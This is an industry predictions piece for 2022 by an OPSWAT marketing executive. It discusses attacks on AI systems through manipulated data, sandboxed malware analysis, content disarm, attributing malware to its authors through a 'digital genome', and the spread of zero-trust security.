Industry executives and experts share their predictions for 2022. Read them in this 14th annual VMblog.com series exclusive.
New Attack Surfaces and Zero-Trust
By Chip Epps, VP of Product Marketing at OPSWAT
We entered 2021 with a renewed focus on security after
navigating a world of hybrid work and a myriad of cybercriminals leveraging new
pandemic-driven attack vectors. And while the public and private sectors paid
closer attention to these threats and began to retroactively assess the
security processes and controls that were rapidly put in place at the start of
the pandemic, we failed to pay close attention to the exploitable attack
vectors in critical infrastructure industries that could cause major
operational and economic disruption - Colonial Pipeline, JBS food supply, a
Florida water system, to name a few.
As the world attempts to stabilize on the road back to
economic recovery, 2022 will present its own cybersecurity challenges even with
government-driven orders to increase the protection of critical infrastructure
sectors. Let's take a look at some of those challenges we foresee in the coming
year, as well as the behavioral trends from organizations looking to combat
them.
AI systems will offer new attack surfaces
With the increased adoption of technologies such as Artificial
Intelligence (AI) and 5G, we will see an increased demand for autonomous
systems across production and logistics environments, including vehicles and
drones, used for B2B and B2C purposes such as and package delivery. More
sensors in these systems mean more data inputs supporting AI-driven actions. We
may very well see the software and data that powers these systems become
targeted by attackers, forcing organizations to think about the implications
should these systems be compromised or sabotaged. As cybercriminals try to stay
one step ahead, the AI systems that support modern businesses become a very
plausible attack surface through the manipulation of those data sets - such as
false data or malware to "trick" the AI to respond a certain way. As the world
has struggled with supply chain challenges, attackers have learned just how
disruptive an attack on AI systems in this capacity could be - and will leverage
this as a way to cause disruption and mass ripple effects across operational channels.
This was a missed 2021 prediction according to Forrester,
who originally predicted that a fifth of enterprises will use commercial drones
to automate business operations. But - due to the immediate pandemic challenges
in 2020 and 2021 with existing supply chains - adoption stalled. Going into
2022 however, we have an increased acceptance of machine-enhanced operations and
expanded use of robotics to combat the ongoing shortages of employees and more,
setting the stage for both streamlined operations and increased risk.
Concepts of malware contact tracing
Rooted in the philosophy of detection and impact analysis, lessons
learned from the COVID-19 pandemic have implications for the cyber security
community - containment applies to pandemics as well as cyberattacks. An
important security prevention activity for organizations, often part of a
proactive or early warning process, is the practice of analyzing
malware in a secured, sandboxed environment to study its behavior and how
it might spread, e.g. persist, escalate, and move - but ultimately, up more defensible
barriers.
With the advanced threats and malware increasing in
complexity, we may see a need for the adoption of broader digital signing and
chains of trust. This may take the form of a "next-gen" Content
Disarm and Reconstruction (CDR) technology and a way for new digital "sec-bots"
to be inserted into digital assets to proactively suppress malicious attributes
of existing files. Similar to pandemic-driven concepts of contact tracing and
location-tracking, these ideas may very well extend into digital assets and infrastructures
along the way like networks and storage to identify all potential touchpoints
of malware and identify core critical digital assets as "safe and acceptable" -
creating a much richer "trust" mark - helping define what assets have been inoculated
and the potential risks to those infrastructures and digital assets exposed to
unverified third-parties.
The idea of a "digital genome" will emerge and
expand
Going into the new year, we may see an emergence of a "digital
genome" (i.e. digital DNA) to better track associated certified
"cyber-engineered" modifications. Cyber-attack groups and specific bad actors
often reuse code components and various TTPs based on their historical success,
or simply as a matter of expediency, and with that comes their unique signature
- like a sequence in their DNA. This could be a simple algorithm unique to an
attack group, or a clone of elements from previous successful attacks they are
familiar with. The practice of threat intel sharing has been very successful as
the industry quickly realized that combatting cyber threats is a global issue. As
hashes are specific to files and have served the community well in managing
distinct threats and threat families, there will be a need to bring this
concept to a higher level. This means doing more to associate malware to its source
or creator - like the sequencing of a gene - to help organizations more quickly
remediate vulnerabilities and risks. With the idea of a "digital genome," malware
researchers and reverse engineers can identify these distinctions and apply
rule-based languages like YARA to detect these malware authors within specific
metadata and behavioral indicators.
Zero-trust security will expand
With more hyper-distributed, micro-segmented environments
where security zones are driven down to the individual level leading to a fundamental
change in architectures, we can expect to see zero-trust security frameworks
deployed at the individual and device level of organizations. Currently, we see
zero-trust principles through the isolation of networks, distributed
application, web servers, departmental teams, and more. At the user and device
level, we can expect to see zero-trust principles implemented via software
deployments to segment users from networks regardless of devices to keep
organizations safe and secure.
While no one anticipated the lasting effects of the pandemic
and major cyber events of 2021, it has certainly impacted the velocity of digital
transformation and increased awareness about emerging threats. It has also impacted
the rate at which we have developed and adopted new technology and the public
and private sectors' response to an evolving threat landscape. As we march
forward into the new year, we are hopeful we will see these critical technological
and behavior changes come into play.
##
ABOUT THE AUTHOR
Chip Epps, VP Product Marketing, joined OPSWAT
in 2021 with a 15+ year security career in both Product Management and Product
Marketing and is CISSP certified. He's focused primarily on emerging product
categories and associated go-to-market strategies spanning security domains
including Endpoint, Datacenter, Network, Gateway, Cloud, IAM, SOAR and Threat
Intelligence. Prior to a career in security, Chip spent 10+ years in IT
operations and service delivery across numerous market segments including
Healthcare, Finance, and Government, being ITIL certified. Chip received his
BME (Mechanical Engineering) from Georgia Tech, was certified Chief Engineer by
Naval Reactors (submarine qualified), and obtained his MBA with a focus on new
ventures from the University of San Diego.